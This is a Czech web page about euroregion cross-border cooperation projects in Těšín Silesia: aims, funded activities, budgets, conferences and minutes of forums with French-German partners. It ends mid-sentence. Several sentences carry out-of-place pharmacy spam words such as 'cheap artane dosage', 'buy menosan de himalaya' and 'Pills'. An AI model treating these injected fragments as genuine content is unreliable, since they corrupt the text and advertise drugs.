Právě se nacházíte: Úvod > Euroregion Tešínské Slezsko > Chceme, abyste o nás věděli!

Chceme, abyste o nás věděli!

Budoucí územní spolupráce v ER TS-ŚC – Chceme, abyste o nás věděli 4

registrační číslo projektu: CZ.3.22/3.3.05/15.04514

 

 

 

Kompletní výstup k dispozici ke stažení zde.

Bružuru, která shrnuje základní výstupu z projektu v CZ jazyce ke stažení zde.

 

Popis projektu:

1.    Zdůvodnění a popis realizace projektu

 

1.1.     Úvod do problematiky

Regionální sdružení územní spolupráce Těšínského Slezska a Stowarzyszeniem Rozwoju i Wspólpracy Regionalnej „Olza“ již 17 let zajišťují územní spolupráci samospráv na území a půdorysu Euroregionu Těšínského Slezska, jehož jsou smluvními partnery. Smlouva definuje prostor ve kterém partneři smlouvy společně iniciují případně realizují cíle a úkoly uvedené ve  smlouvě (viz. níže v bodě 1.2. Popis současného stavu územní spolupráce). Euroregion je oblast příhraniční spolupráce, která vznikla na základě vzájemné dohody příhraničních regionů dvou nebo více zemí. Euroregion funguje na základě vlastních stanov. Podporuje zájmy měst a obcí, sdružení organizací i fyzických osob. Na regionálním základě podporoval aktivity, které vedly k přijetí do Evropské unie a uzavírání mezinárodních smluv napomáhajících přeshraniční spolupráci.

U příležitosti ukončení programového období 2007-2013 nadešel čas nejen pro vyhodnocení této spolupráce, ale rovněž pro nové nastavení priorit rozvoje územní spolupráce a pro přípravu absorpce pro nové programové období pro roky 2014-2020. V rámci této přípravy absorpce je prioritně nutné správně identifikovat potřebnost jednotlivých aktivit v území. Dále je vhodné již nyní připravit území na nové programové období, vytvořit pro toto období nové podmínky. Primárně jde o zajištění potřebného průniku mezi potřebností v oblasti územní spolupráce a možnostmi financování této spolupráce. Součástí projektu je proto i příprava technického zabezpečení žadatele potřebou technikou pro plynulý přechod k další etapě rozvoje územní spolupráce. Jde o technické zázemí v podobě obměny dosluhující techniky – 3 ks notebooků včetně software a dokovací stanice, fotoaparát, multifunkční zařízení (kopírka, scanner, tiskárna), skartovačka, vybavení zasedací místnosti o skládací konferenční stoly (místnost, kde probíhají například školení žadatelů apod.). Během průběhu projektu se budou koordinátoři projektu aktivně setkávat se zástupci místních samospráv s akcentem na směřování rozvoje územní spolupráce v blízké budoucnosti s návazností na možnosti čerpání zdrojů pro tuto spolupráci.

 

1.2. Popis současného stavu územní spolupráce

Za roky spolupráce byla mnohokrát iniciována spolupráce v rámci území, byly navázány formální i neformální vztahy mezi obyvateli euroregionu. Na úrovni jednotlivých představitelů měst a obcí pravidelně dochází k formálním i neformálním setkáním, jejichž iniciátory jsou právě smluvní partneři Euroregionu.

RSTS je rovněž členem česko-slovenské mezivládní komise. Společně se svým polským partnerem je RSTS (Euroregion) vhodným administrátorem Fondu mikroprojektů.

 

Program

Počet  projektů

Výše v EUR

Phare CBC – SFMP

42

357 155

Iniciativa INTERREG IIIA 2004-2006

40

307 963

OPPS ČR – PR 2007-2013

124

2 293 307,87

Z tabulky je zřejmé, že v regionu bylo již formální cestou provedeno přes 200 projektů s charakterem územní spolupráce s podporou různých dotačních titulů, jejichž administrací bylo pověřeno právě RSTS. Celkový finanční dosah skoro 3 mil. Euro.

 

V současné době činnost Euroregionu vychází ze schváleného statutu. Úkoly a činnosti Euroregionu jsou tyto:

1. Euroregion podporuje v pohraničních územích rozvoj zejména v těchto oblastech činností:

a) výměna zkušeností a informací při rozvoji regionu,

b) výměna zkušeností a informací z oblasti trhu práce,

c) spolupráce při územním plánování,

d) řešení společných zájmů v oblasti dopravy, komunikací a spojů a bezpečnosti obyvatel,

e) řešení společných problémů ekologie a životního prostředí,

f) spolupráce při prevenci a řešení cheap artane dosage důsledků živelných pohrom,

g) spolupráce v oblasti hospodářské a obchodní,

h) rozvoj turismu a cestovního ruchu včetně rozvoje a dalšího zlepšení hraničního styku,

i) akce podporující rozvoj kultury, osvěty a sportu, zejména poskytování informací o jednotlivých aktivitách,

j) kulturní výměna a péče o společné kulturní dědictví,

k) vzájemná spolupráce záchranných a horských služeb na území Euroregionu,

l) spolupráce mezi školami a mládeži na území Euroregionu.

2. Euroregion podporuje v rámci svých možností zájmy měst a obcí, sdružení, organizací  i fyzických osob, které odpovídají rozvojovým cílům regionu.

3. Euroregion napomáhá na regionální Buy úrovni všem činnostem, které povedou k přistoupení České republiky a Polské republiky do Evropské unie.

4. Euroregion podporuje uzavírání mezinárodních smluv, vedoucích ke spolupráci přesahující hranice.

Revizí a vyhodnocením úspěšnosti územní spolupráce právě Cheap v těchto oblastech je stěžejním úkolem a primárním krokem pro definice dalších kroků na cestě k úspěšnému rozvoji regionu v letech 2014-2020.

 

2.      Cíle projektu, cílové skupiny

2.1. Cíle projektu

Jak je naznačeno ve zdůvodnění a popisu realizace projektu jsou cíle projektu především v oblasti:

1. Správná identifikace potřeb v oblasti územní spolupráce

2. Příprava správné absorpce prostředků v rámci nového programového období

3. Příprava technického zabezpečení územní spolupráce

Cíle projektu respektují všeobecné cíle OPPS ČR – PR a vychází ze specifických potřeb území. Jsou zaměřeny primárně na: zvyšování ekonomické integrace česko-polské příhraniční oblasti.

2.2. Cílové skupiny projektu

Cílovými skupinami projektu jsou:

1. primární cílová skupina: představitelé samospráv

2. primární cílová skupina: představitelé vhodných žadatelů

3. v širším pojetí jsou cílovými skupinami všichni obyvatelé území Euroregionu TS-ŚC

Primární cílové skupiny budou přímými respondenty i uživateli Studie územní spolupráce, stěžejního výstupu projektu. V rámci projektu budou zjišťovány a iniciovány potřeby primárních cílových skupin. Tyto potřeby budou analyzovány a roztříděny pro potřeby územní spolupráce. Následná územní spolupráce pak bude mít vliv na rozvoj celého území Euroregionu proto jsou v širším pojetí cílovou skupinou jeho všichni obyvatelé.

 

3.      Popis aktivit projektu

Primární aktivitou projektu je tvorba Studie, která bude analyzovat dopady územní spolupráce za poslední programové okolí především s následným akcentem na vývoj priorit územní spolupráce pro následující období v letech 2014-2020. V rámci projektu se žadatel bude aktivně setkávat se zastupiteli. Osloveni budou během 4 měsíců všichni představitelé dotčených obcí (40 na CZ území, 17 na PL území). Oslovení proběhne formou workshopů, které budou mít charakter kvalitativního výzkumu trhu metodou focus group. Bude rovněž proveden kvantitativní výzkum mezi zástupci municipalit s cílem kvantifikovat data o územní spolupráci s následným akcentem na vývoj priorit územní spolupráce pro následující období v letech 2014-2020. Výstupem obou aktivit je tvorba podkladů pro vytvoření Studie územní spolupráce respektující názory zastupitelů, která by určila další směr územní spolupráce v regionu Těšínského Slezska. Jedním ze stěžejních výsledků by měla být revize cílů územní spolupráce. Výstupy budou dále prezentovány všem dotčeným subjektům, mimo jiné umístěním studie na internetové prezentace Euroregionu i RSTS. Vyvrcholením projektu bude pořádání závěrečné konference v Českém Těšíně, kde budou účastníci z územních samospráv (60 CZ a 40 PL) seznámeni s výstupy Studie.

Primárním výstupem projektu bude Studie územní spolupráce pro léta 2014-2020, která bude analyzovat průnik potřeb v oblasti územní spolupráce a možností financování těchto potřeb. Výstupy této studie by měly mít tuto strukturu:

1. iniciace projektů s možností financování pomocí programu Interreg V A

2. iniciace projektů ve smyslu Smlouvy o Euroregionu s pomocí financování z jiných zdrojů

3. iniciace projektů mimo CZ-PL spolupráci s jinými formami financování

Na tvorbě Studie se bude aktivně podílet team složený z dodavatele workshopů a kvantitativního výzkumu trhu a koordinátor a asistent koordinátora projektu. Koordinátorem projektu a asistentem koordinátora za RSTS budou pověřené osoby s dlouholetou zkušeností s prací v této oblasti. Dodavatel workshopů a kvantitativního výzkumu trhu bude vybrán výběrovým řízením. Naplnění obsahu Studie bude provedeno pomocí řízených rozhovorů se zástupci obcí (starosta, místostarosta, pověřená osoba) formou kvalitativních forem marketingového výzkumu trhu, metodou focus group či hloubkovými rozhovory. Tato setkání budou prováděná na obou stranách hranice a zpracovatel (projektový team) zohlední ve výsledné studii i výsledky ze zrcadlové studie partnerského projektu. Tímto dojde k transferu informací.

Studie je nezbytná pro splnění prvního cíle projektu, kterým je správná identifikace potřeb v oblasti územní spolupráce. Druhého cíle studie – Příprava správné absorpce prostředků v rámci nového programového období – bude kromě realizace Studie dosaženo setkáváním koordinátorů RSTS se zástupci zastupitelů. Na těcho setkáním budou vhodní žadatelé informováni o zásadách a možnostech v územní spolupráci pro roky 2014-2020.

Třetím cílem projektu je příprava technického zabezpečení územní spolupráce. Pro zajištění možnosti následné územní spolupráce je nutné i zajistit odpovídající zázemí pro nositele územní spolupráce. Jedná se o vybavení školící místnosti 16 kusy stolů. Dále je poptáváno vybavení 3 kusy notebooků vč. software s dokovací stanicí a fotoaparát pro účely administrace a skartovačky na neplatné dokumenty. V neposlední řadě se pak jedná o multifunkční stroj (kopírka, scanner, tiskárna), který je nezbytnou součástí kancelářských činností.

 

4.      Publicita

1. Na webových stránkách RSTS budou umístěny informace o projektu včetně zdrojů financování v souladu s pravidly publicity (symbol EU, logo Programu, znak Euroregionu TS – ŚC).

2. Na společných česko – polských euroreg. webových stránkách www.euregio-teschinensis.eu budou umístěny informace o projektu včetně zdrojů financování v souladu s pravidly publicity.

3. Zásady publicity budou respektovány na všech písemných dokumentech – na prezenčních listinách, na prezentacích věnovaných projektu.

4. Pořízené vybavení a reklamní předměty budou označeny v souladu s pravidly publicity (symbol EU, logo Programu, znak Euroregionu TS – ŚC).

5. Výsledná studie bude rovněž opatřena povinnou publicitou a bude volně ke stažení na výše uvedených dvou internetových prezentacích.

6. Polský partner dodá tisky (750 brožur – shrnujících hlavní závěry Studie), které budou distribuovány cílovým skupinám. První část distribuce proběhne při závěrečné konferenci. Zbylé CZ výtisky převezme RSTS a bude distribuovat cílovým skupinám při své každodenní praxi.

 

5.      Organizační zabezpečení realizace projektu

Statutární zástupce Sdružení pověří zodpovědnou osobu, koordinátora projektu a asistenta koordinátora, kteří bude odpovídat za provedené úkony při realizaci projektu. Jedna osoba bude mít na starost administraci projektu.

Část aktivit projektu bude realizována dodavatelsky, především se jedná o dodávku kvantitativního výzkumu trhu a 4 workshopů kvalitativního charakteru. Vybraný dodavatel těchto vstupních podkladů pro tvorbu Studie bude úzce spolupracovat s koordinátorem a jeho asistentem na výsledné podobě Studie.

Chceme abyste o nás věděli!

Těšínské Slezsko je historické území, rozdělené státní hranicí na řece Olze mezi dva státy – Českou republiku a Polsko. Po dlouhá staletí tak tomu ale nebylo. Díky své geografické poloze na styku několika národů se stalo místem setkávání a vzájemného ovlivňování jazyků a kutur, společně zde žili jeho obyvatelé hovořící sice různými jazyky, ale spojení svými osudy.

V roce 1920 došlo k rozdělení Těšínského Slezska a jen málokdo si dovedl představit, že za několik desetiletí budou lidé, kteří v tomto prostoru žijí, hledat společně své kořeny a rozvíjet přeshraniční spolupráci.

Po vstupu do Schengenského prostoru se situace částečně vrací do dob minulých.

Partneři Smlouvy o regionální spolupráci pod názvem Euroregion Těšínské Slezsko – Śląsk Cieszyński – Regionální sdružení územní spolupráce Těšínského Slezska (na české straně) a Stowarzyszenie Rozwoju i Współpracy Regionalnej „Olza” (na polské straně) vytvářejí společně prostor, ve kterém je možné odstraňovat negativní důsledky rozdělění Těšínského Slezska, odstraňovat předsudky o „druhé straně” a zlepšovat mazilidské vztahy a kvalitu života lidí žijících po obou stranách hranice.

Podstatným elementem spolupráce jsou ideální podmínky pro spolupráci vycházející z blízkosti a dosažitelnosti obou partnerů. Ideální podmínky pro spolupráci jsou umocněny dlouholetými zkušenostmi zástupců jednotlivých partnerů z oblasti přeshraniční spolupráce, jejich dlouhodobého vzájemného poznání, tolerance, kompromisu a vůle rozvíjet tuto část česko-polské hranice. Projekty realizované v rámci ER TS-ŚC jsou projekty prokazujícími trvanlivost projektových záměrů a česko-polské spolupráce.

Ne všichni ale vědí o euroregionálních aktivitách, a proto bylo nutné je ukázat široké veřejnosti s cílem prohloubení vzájemné důvěry. S ohledem na tuto skutečnost se oba partneři – Regionální sdružení územní spolupráce Těšínského Slezska a Stowarzyszenie Rozwoju

i Współpracy Regionalnej „Olza“ rozhodli realizovat projekt online Chceme, abyste o nás věděli. ER TS – ŚC škola evropské integrace a prohlubování vzájemné důvěry.

Hlavním cílem projektu byla propagace Euroregionu TS – ŚC a myšlenky česko-polské spolupráce obecně prostřednictvím:

- vítacích tabulí (na české straně 4 ks vítacích tabulí, na polské straně 9 vítacích tabulí a 16 informačních tabulí),

- společných internetových stránek,

- propagačních materiálů (informační brožury na cz straně, na pl straně symboly Euroregionu TS-ŚC – diplom, pamětní medaile týkající se přeshraniční spolupráce, insignie Euroregionu),

- závěrečné konference.

Struktura financování české části projektu :

Celkové způsobilé výdaje: 17 870,00 € (100 %)

ERDF: 15 189,50 € (85 %)

Vlastní spolufinancování: 2 680,50 € (15%)

Průběh realizace české části projektu:

Veškeré činnosti související s realizací projektu projednávala Programová rada.

Programová rada spolupracovala s pracovní skupinou a koordinátorem projektu a schvalovala věcnou a obsahovou náplň jednotlivých aktivit projektu.

Aktivity projektu:

1. Výroba vítacích tabulí

Pro umístění na silničním vjezdu do ER TS – ŚC v Mostech u Jablunkova, Horních Tošanovicích, Havířově a Bohumíně byly vyrobeny 4 kusy vítacích tabulí, 2 s motivem hornického kroje, 1 s gorolským krojem a 1 s těšínským krojem.

2. Nové internetové stránky

Byly zprovozněny společné internetové stránky Euroregionu Tešínské Slezsko – Śląsk Cieszyński.

Od těchto internetových stránek si oba partneři Euroregionu slibují zlepšení informovanosti široké veřejnosti. Koncepce těchto stránek je zaměřena, jak na vytváření prostoru pro zlepšení komunikace s obcemi prostřednictvím „fóra obcí”, tak i na zlepšení informovanosti mladých lidí např. z řad studentům prostřednictvím „young zone”. Nové webové stránky jsou připravené na trvalé dopracováváni s jednotlivými regionálními aktéry, zejména se zástupci obcí.

3. Informační brožura

Brožura má název „Proč Euroregion Těšínské Slezsko?“ a jejim hlavním cílem je rozšiřovat povědomí o Těšínském Slezsku mimo jeho hranice. Informuje o tom, co tento region nabízí a čím je odlišný a vyjímečný. V šesti samostatných částech zodpovídá na otázku, proč tento region navštívit.

  1. Protože máme Trojmezí a folklór – region je na pomezí tří států – České republiky, Polska a Slovenska.
  2. Protože máme Infotur pro Slezské a Moravskoslezské Beskydy – společná koncepce produktu cestovního ruchu.
  3. Protože je tady dvojměstí Český Těšín a Těšín – unikátní dvojměstí se společnou historií, produktivní současností a krásnou budoucností.
  4. Protože nabízíme lázeňství – lázeňství po obou stranách hranice má svou dlouhou tradici.
  5. Protože nabízíme dopravní dostupnost – region je pro všechny návštěvníky dobře dostupný.
  6. Protože jsou s tímto regionem spjaty významné osobnosti.

Informační brožura je ke stažení ve formátu pdf  ZDE

Závěrečná konference

14. 12. 2011 proběhla v Kulturním a společenském středisku „Střelnice“ v Českém Těšíně mezinárodní česko – polská konference, která byla věnována představení výstupů projektu „Chceme, abyste o nás věděli“, zhodnocení 20 let spolupráce českých a polských samospráv ER TS – ŚC a výhledu přeshraniční spolupráce. Na konferenci, kterou provázel moderátor, byly předány plakety za podporu přeshraniční spolupráce a poděkování zástupcům místních obcí za dlouholetou spolupráci.

V první části setkání představili společně V. Laštůvka a B. Kasperek (český a polský Správce Fondu mikroprojektů ER TS – ŚC) souhrn nejvýznamnějších aktivit, události a změn, které region pomáhaly 20 let zlepšovat a spojovat. Prezentaci doprovázely dobové fotografie a videa ze společných setkání a zlomových okamžiků.

Prezentace ke stažení Konference – Chceme abyste o nás věděli.

Ve druhé části konference byly představeny výstupy projektu Chceme, abyste o nás věděli! ER TS –ŚC škola evropské integrace a prohlubování vzájemné důvěry – vítací tabule, informační brožura a byly rovněž prezentovány nově vzniklé společné internetové stránky ER TS – ŚC.

Na závěr zástupci samospráv hovořili o přípravě nového programovacího období 2014 – 2020, kdy pravděpodobně dojde k významnému navýšení objemu evropských peněz k rozdělení, ale i větší kontrole a většímu důrazu na výsledek projektu.

Celé setkání zpříjemnilo vystoupení Zespołu Pieśni i Tańca Ziemi Cieszyńskiej a Noemi Bocek z Třince, vítězky pěvecké soutěže Werk Anděl (která byla spolufinancována z prostředků Operačního programu přeshraniční spolupráce ĆR – PR 2007 – 2013 z Fondu mikroprojektů ER TS – ŚC).

Vlastní projekt: Chceme abyste o nás věděli II

 

 

 

Tento projekt je spolufinancován z prostředků Operačního programu přeshraniční spolupráce ČR – PR 2007 – 2013 z Fondu mikroprojektů Euroregionu Těšínské Slezsko – Śląsk Cieszyński.

Popis projektu

RSTS a SRiWR „Olza“ společně realizují již 15 let řadu aktivit podporujících rozvoj regionu v různých oblastech. Cílem projektu je iniciace nového rozměru územní spolupráce v oblasti předávání informací mezi samosprávami po obou stranách hranice za účelem přípravy území na absorbci finančních prostředků v rámci nového programovacího období 2014-2020. Tímto rozměrem je inovovaný informační systém, jehož centrálním bodem je nadobecní informační portál, jenž automaticky eviduje informace zveřejněné na internetových stránkách českých a polských obcí.

Po vybudování páteřní sítě, jsou evidovány informace o nabídkách a poptávkách obcí, dále informace o aktuálním dění v jednotlivých obcích a vypsaných výběrových řízeních. Následně k nim budou přidávány další oblasti, které byly řešeny s polským partnerem společně – ochrana zdraví, spolupráce bezpečnostních složek a krizového řešení, oblast podnikání. Systém je tak obohacen o nové informace. Všechny shromažděné informace třídí proškolený odborný koordinátor.

Vytříděné informace jsou zpětně publikovány na internetových stránkách většiny českých a polských obcí, na stránkách obou sdružení a na společných euroregionálních stránkách www.euregio-teschinensis.eu. Nutnou podmínkou pro realizaci nového rozměru činnosti RSTS a SRiWR „Olza“  v rámci zkvalitnění předávání informací je zlepšení technického zázemí RSTS a SRiWR „Olza“  o základní techniku. Tuto techniku budou navzájem využívat oba partneři projektu. Další aktivitou je pořízení reklamních předmětů.

 

Cíle projektu

1. Podpora přeshraniční spolupráce a ideí Euroregionu Těšínské Slezsko na regionální úrovni, především zvyšování povědomí u místních a regionálních komunit (včetně veřejné správy), mimo jiné o tom, jaká je role Euroregionu a jaký je jeho přínos v rozvoji česko – polského pohraničí, zviditelnění Euroregionu na veřejnosti a posílení jeho image.

2. Zlepšení kvality technického vybavení pro další rozvoj přeshraniční spolupráce na místní, regionální a mezinárodní úrovni.

Cílové skupiny

1. Obyvatelé ER TS – ŚC -  zvyšování informovanosti občanů v oblasti přeshraniční spolupráce a úlohy Euroregionu TS v rozvoji česko – polského pohraničí.

2. Samosprávy ER TS – ŚC – účast na vývoji moderních informačních technologií a jejich aplikaci v oblasti přeshraniční spolupráce.

3. Národní a zahraniční instituce spolupracující s ERTS, obzvlášť z francouzsko – německého pohraničí – buy menosan de himalaya utužování kontaktů, výměna zkušeností a dobré praxe, plánování společných činností.

4. Zástupci zákonodárců z České republiky a Polské republiky – prezentace složitých otázek a právních překážek v konkrétních oblastech spolupráce v oblasti přeshraniční spolupráce a snaha podniknout kroky, aby došlo ke změně v právních předpisech.

Popis aktivit

1. Úvodní konference se všemi CZ – PL samosprávami ER TS – ŚC – představení projektu, jeho cílů a aktivit, aktivizace obcí do realizace projektu – 1/2013

2. Výběr zhotovitele a tvorba informačního systému – 2-11/2013

3. Průběžná pracovní setkávání osob zodpovědných za realizaci projektu a zhotovitele informačního systému – koordinace grafického a věcného obsahu informačního systému – 3-11/2013

4. Komunikace s obcemi na české straně Euroregionu ohledně zapojení obcí do vznikajícího informačního systému – 3-11/2013

5. Odborné proškolení koordinátora v oblasti sběru a třídění Pills informací, jejich publikace, správy a rozvoje portálu – 11-12/2013

6. Zlepšení technického zázemí RSTS o základní techniku nutnou pro další rozvoj česko – polské spolupráce (ozvučovací sestava s mikrofony, projekční plátno, dataprojektor, notebook) -  1-11/2013

7. Pořízení reklamních předmětů (tašky na dokumenty, plátěné tašky, trhací bloky) – 4-10/2013

8. Závěrečná CZ – PL konference se samosprávami – představení výstupů projektu – 12/2013

 

V realitě došlo ke dvojímu prodloužení projektu a to do konce ledna 2015. Důvody prodloužení projektu byly technické problémy polského partnera a tím pádem prodloužení především ve finalizaci  webového portálu. Závěrečná konference se konala u příležitosti zasedání Česko-polské mezivládní komise v Třinci v říjnu roku 2014, kde byl systém i podrobně představen.

 

 

ZÁPIS Z PRŮBĚHU PŘESHRANIČNÍCH FÓR USKUTEČNĚNÝCH V OBDOBÍ OD ČERVNA DO LISTOPADU ROKU 2014 V RÁMCI PROJEKTU
„CHCEME, ABYSTE O NÁS VĚDĚLI II – FÓRUM ÚZEMNÍ SPOLUPRÁCE”
Těšín, leden roku 2015

 

ZÁPIS Z PRŮBĚHU PŘESHRANIČNÍCH FÓR
USKUTEČNĚNÝCH V RÁMCI PROJEKTU
„CHCEME, ABYSTE O NÁS VĚDĚLI II – FÓRUM ÚZEMNÍ SPOLUPRÁCE”
Sdružení pro regionální rozvoj a spolupráci (Stowarzyszenie Rozwoju i Współpracy Regionalnej) „Olza”
v rámci projektu „Chceme, abyste o nás věděli II – Fórum územní spolupráce” spolufinancovaného z
Fondu mikroprojektů operačního programu přeshraniční spolupráce 2007-2013 Česká republika –
Polská republika v Euroregionu Těšínské Slezsko bylo organizátorem osmi přeshraničních konferencí
při účasti představitelů partnerů projektu1, lokální samosprávy, představitelů různých institucí z
francouzsko-německého pohraničí, především EURODISTRIKTU REGIO PAMINA, expertů a poslanců.
Účelem uspořádání těchto konferencí byla výměna zkušeností a osvědčených postupů z oblasti
zvolené problematiky mezi pohraničím polsko-českým a francouzsko-německým, a dále upozornění
představitelů moci zákonodárné a výkonné České republiky a Polské republiky na problémy a
překážky právního rázu vyskytující se v konkrétních oblastech přeshraničního působení, jež jsou
výchozím bodem směřujícím k zavedení změn v legislativních předpisech. Během konferencí byla
využita multimediální technika a konferenční systém a obsahem konferencí byly následující otázky:
ochrana životního prostředí, ochrana zdraví, spolupráce bezpečnostních složek krizového řešení,
oblast podnikání. Každá otázka byla projednávána během dvou následujících konferencí – první, jež
měla spíše pracovní charakter, a druhé, oficiální. Během prvního fóra měli účastníci možnost seznámit
se se dvěma okruhy – otázkami a rozhodnout, která otázka bude podrobněji prezentována během
následujícího fóra – konference.
POPIS PRVNÍ A DRUHÉ PŘESHRANIČNÍ KONFERENCE
HLAVNÍ ZÁVĚRY
Popis:
První dvě konference (fóra) se zabývaly otázkou podnikatelských aktivit.
Během první videokonference odborníci z francouzsko-německého pohraničí prezentovali dva
tematické okruhy: „Postup obnovy ve prospěch přeshraniční oblasti” a „Oživení městských center v
regionálním, přeshraničním kontextu”. Po seznámení se s prezentovanými tématy, účastníci rozhodli
jednohlasně, že otázka „Oživení městských center v regionálním, přeshraničním kontextu” má být
hlavním tématem během další, oficiální konference.

 

Během druhé videokonference prezentovali odborníci z francouzsko-německého pohraničí
problematiku souvísející s oživením městských center v regionálním, přeshraničním kontextu na
příkladu partnerských měst – německého Landau a francouzského Haguenau.
Hlavní závěry:
- výchozím bodem pro dosažení úspěchu dvou partnerských měst, Landau a Haguenau, byl jejich
společný sen – usilování o to, aby působení, aktivity související s obchodem, byly soustředěny v
centrech měst a aby nebyly přesouvány na jejich okraje;
- strategie města byla vypracována a konzultována společně s jejich občany, majiteli obchodů a
obchodníky samotnými;
- díky této iniciativě se na jednu stranu podařilo zachovat obchodní činnost v centrech měst (není
možné umístit obchody mimo město/na jeho okraje), na druhou stranu zase utvářet dynamická
městská centra (zóny pro cyklisty s možností dobití baterií u eletrických kol, zóny pro setkávání
pěších, letní zahrádky, terasy); najít další parkovací místa; zajistit organizaci akcí (jarmarky, koncerty,
festivaly, rallye);
- příklad spolupráce dvou měst z francouzsko-německého pohraničí může posloužit jako motivace pro
města z pohraničí česko-polského (např. Cieszyna – Českého Těšína) pro zahájení podobných aktivit.
Partneři z francouzsko-německého pohraničí. Účastníci přeshraničního fóra věnovaného podnikatelské oblasti.
(Snímky: Archív SRiWR „Olza”)
POPIS TŘETÍ A ČTVRTÉ PŘESHRANIČNÍ KONFERENCE
HLAVNÍ ZÁVĚRY
Popis:
Třetí a čtvrté fórum bylo věnováno otázce ochrany a podpory zdraví.
Během třetí videokonference odborníci z francouzsko-německého pohraničí seznámili ostatní s
následujícími tematickými okruhy: „Spolupráce záchranných složek ve francouzsko-německé
přeshraniční oblasti (záchranky, záchranáři, vrtulníky)” a „Zdravotně preventivní programy zaměřené
na volnočasové aktivity” – příkladem byl projekt PAMINA 21 – PAMINA PER PEDES”. Po seznámení se
s problematikou schválili účastníci jednohlasně, že otázka „Spolupráce záchranných složek v
přeshraniční oblasti (záchranky, zdravotní záchranáři, vrtulníky)” má být dále projednávána během
dalšího, oficiálního fóra.
Během čtvrtého, oficiálního fóra odborník z francouzsko-německého pohraničí seznámil účastníky s
problematikou související s přeshraniční spoluprací záchranných složek, hlavně pak s fungováním
přeshraniční francouzsko-německé sanitky a dále přizpůsobení provozování lékařské praxe po obou
stranách hranice v rámci fungování mezioblastní nemocnice nad řekou Lauter ve Wissembourgu.
Hlavní závěry:
- v sanitním autě ve francouzsko-německém pohraničí je řidič zároveň zdravotnickým záchranářem,
oproti tomu plní zdravotní sestry úlohu překladatele (znalost obou jazyků – francouzského a
německého je formálním požadavkem, jež musí být splněn pro nástup do funkce zdravotní sestry);
- obecně jsou Němci odváženi do nemocnice v Německu, Francouzi do nemocnice ve Francii;
- existují dvě nouzová telefonní čísla pro první pomoc: francouzské a německé;
- nemocnice ve Wissembourgu, ačkoliv se nachází na francouzské straně, přijímá rovněž pacienty z
německé strany (hlavně akutní případy);
- myšlenku dobře fungující přeshraniční sanitky ve francouzsko-německém pohraničí je možno zvážit
do budoucna rovněž v česko-polském pohraničí.
Popis:
Páté a šesté fórum bylo věnováno problematice bezpečnostního a krizového managementu.
Během páté videokonference seznámili odborníci z francouzsko-německého pohraničí ostatní
účastníky s následujícími tematickými okruhy: „Přeshraniční spolupráce hasičských sborů na lokální
úrovni” a „Pohromy – plány/projekty chráníci před případnými živelnými a jinými pohromami na
přeshraniční úrovni”. Po seznámení se s problematikou, s ohledem na zájem účastníku o obě témata,
bylo rozhodnuto, že obě otázky budou dále předmětem diskuze dalšího, oficiálního fóra.
Během šesté videokonference přednesli odborníci z francouzsko-německého pohraničí následující
témata: „Přeshraniční spolupráce hasičských sborů v Departmentu Dolního Rýnu” a „Postupy v
případě chemických havárií v pohraničí”.
Nejdůležitější závěry:
- přeshraniční spolupráce hasičů ve francouzsko-německém pohraničí nepramení z formálních
zápisů/smluv, jedná se pouze o dobrou vůli obou stran;
- přes rozdíly ve způsobu fungování hasičských sborů ve Francii a Německu se jim daří spolupracovat –
příkladem je přeshraniční francouzsko-německá požární loď EVROPA 1, tato slouží pro záchranné akce
na řece Rýn;
- majitelem lodi je lokální sdružení přeshraniční spolupráce (GLCT) s názvem „Požární loď EVROPA 1”.
Tento projekt byl spolufinancován z prostředků Evropské Unie v rámci programu INTERREG III A Horní
Rýn;
- Tento příklad přeshraniční spolupráce hasičů ve francouzsko-německém pohraničí ukazuje, že i přes
rozdíly v právním systému obou států a způsobu fungování hasičských sborů po obou stranách
hranice, je-li dobrá vůle a jsou-li společné cíle, je možné vždy najít řešení problému spočívajícího v
hledání „přijatelného východiska” z dané situace.
V případě přeshraniční spolupráce hasičských sborů byla předmětem hledání společného řešení ze
situace spojka požární hadicová, jiná v Německu a jiná ve Francii, což v počátcích bylo překážkou a
bránilo možné spolupráci. Podařilo se vytvořit novou, společnou spojku požární hadicovou,
odpovídající požadavkům Evropské Unie.
- Příklad přeshraniční spolupráce požárních sborů ve francouzsko-německém pohraničí může být
inspirací pro případné úsilí při hledání „společného řešení” v různých oblastech polsko-české
spolupráce souvísející s bezpečnostním a krizovým managementem.
POPIS SEDMÉ A OSMÉ PŘESHRANIČNÍ KONFERENCE
HLAVNÍ ZÁVĚRY
POPIS:
Sedmé a osmé fórum bylo věnováno otázce ochrany životního prostředí.
Během sedmé videokonference byli účastníci konference seznámeni odborníky z francouzskoněmeckého
pohraničí s následujícími tématy: „Strategický přístup k trvalému rozvoji a zlepšení kvality
vody v řece Lauter díky výstavbě čistírny odpadních vod v pohraničí” a „Výstavba v biosferické
rezervaci Falcký les a severní Vogézy. Energie – Prostředí – Regionální architektonické dědictví”. Po
seznámení se s prezentovanou problematikou, s ohledem na zájem účastníků o oba tematické okruhy,
bylo rozhodnuto, že obě otázky budou podrobněji řešeny během dalšího, oficiálního fóra.
Avšak hlavním tématem bude otázka první.
Během osmé videokonference odborníci z francouzsko-německého pohraničí prezentovali následující
témata: „Strategický přístup k trvalému rozvoji a zlepšení kvality vody v řece Lauter díky výstavbě čistírny odpadních vod na pohraničí” a „Správa přeshraniční biosferické rezervace Falcký les a severní
Vogézy”.
Nejdůležitější závěry:
- čistírna odpadních vod s přeshraničním působením se nachází ve Wissembourgu a čistí vodu
používanou po obou stranách hranice;
- projekt byl spolufinancován Evropskou Unií z Evropského fondu pro regionální rozvoj v rámci
programu INTERREG IV Horní Rýn;
- personál zajišťující provoz čistírny odpadních vod je dvojjazyčný, francouzský. Francouzi spolupracuji
se svými kolegy na německé straně;
- čistička je pod správou lokálního sdružení přeshraniční spolupráce (GLCT);
- biosferická rezervace Falcký les – severní Vogézy je od roku 1998 na seznamu světového dědictví
UNESCO;
- zajímavou, inovující přeshraniční myšlenkou realizovanou v rezervaci byl projekt s názvem „Zástavba
v biosferické rezervaci Falcký les – severní Vogézy. Energie – Prostředí – Regionální architektonické
dědictví spočívající v modelové renovaci vybrané stavby nacházející se na území biosferické rezervace
se zachováním obrysů římsy a původního vzhledu stavby, jejiž cílem bylo zlepšení energetického
efektu objektu.
V rámci projektu proběhla renovace stavby na základě víceplošné analýzy současného stavu. Byl
vydán průvodce týkající se ekologické renovace staveb a proběhl cyklus přeshraničních školení a
pracovních dílen vedených odborníky z praxe, určených pro architekty, stavaře, projekční kanceláře,
řemeslníky, samosprávy a jednotlivce. Celkem bylo proškolených 100 účastníků;
- tato myšlenka by se dala prosadit v budoucnu také v česko-polském pohraničí. Může být rovněž
